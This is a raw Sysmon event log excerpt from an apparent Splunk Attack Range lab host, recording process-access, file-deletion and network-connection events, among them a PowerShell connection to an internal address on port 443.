13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C669A0ECF85A65FDC7B907616C03D66F,SHA256=9E76343F2DD24719E8968004B9A3DF021E83E05E191EC57B3F2A683270152F94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=2ECF2A124512142A05AF38BF9A30E591,SHA256=EDCB64D25954992156369616320687C5CF94E935A90FE2636AAE47D41640E610,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=2AD636848D2A1D27241647831440C943,SHA256=58CA924CDEFC684DB546A5D171AB3AB5CE0A357D980C38D050B0F90CB236BDF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=FAC79F2039A1A3AE1F58A50E72D2422C,SHA256=434138DCEAD8F39302BF1353EEBFD679F0C35B50964DA6B8DE646C6502D6EC6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=BA57EFB779E4790722DC6E4823182399,SHA256=AE6545E3D03E998FC554D3F82FA6949421EC998A67B4B8295603DDBCE35A6582,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A3EE977B3513C8FE99A26DB4F7AC20A2,SHA256=6E9B9D69053CB33C6E28093A2D2C89CA75F9A8C767046F032676026CABB15873,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=1B2DAF9A91FA15DD004EE95F85BBC356,SHA256=0E8AD398F066F6939459268AF7014E33A27125A922A6DC53FCE9F1BE44388E22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:01.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5231D285D545412BE6A69D927F33BD39,SHA256=98D8C9B66815C10B167D5951EC2CF3F3B290B121A9A9FB885FC6DFF44E617BFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:02.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66F65F236DE1A2BE5B3F3219A9A8E88,SHA256=F00C3A516D6F9712B9E69D1601FACC07669CB3178ECEC7DF8B7C8608E9277FD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:34.023{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:03.601{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0FC52E69FC008A7842DC3E60691C8E3,SHA256=A47E7FD5F6D9B1361A5799456179ED8C61652E55493F62806D154E04DAFACC32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:03.370{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C0134E78F5BD34206ADE93615F9CB9BB,SHA256=A0EDD6883DC7A7F50A1E83E1948578A031069B7243575AA2BF85985E5762CD35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:04.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F20C97823139A8F8369C8DE4028EC1C0,SHA256=33FC920EC6E5CD10E81BE8567A227688DB45AA63931A6422F0A2257A76CD39EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036498488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:35.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50650-false10.0.1.12-8000- 23542300x800000000000000036498487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:05.632{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AAB8AB0361E60EC94BE516260B2A686,SHA256=22F85DDAFD4815DA7E589E75BDF4264D17AB77312F3CF43E1AD13B824F9A459B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:06.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA8BDA8FF7B071DE1C0A0BF859477667,SHA256=2D6EC6301B19EB199C30493E87AF3D7AAB4F00B895DA69ADAC3097D92C65079E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.980{B81B27B7-A1FF-6140-AC56-04000000C801}69323380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.832{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\n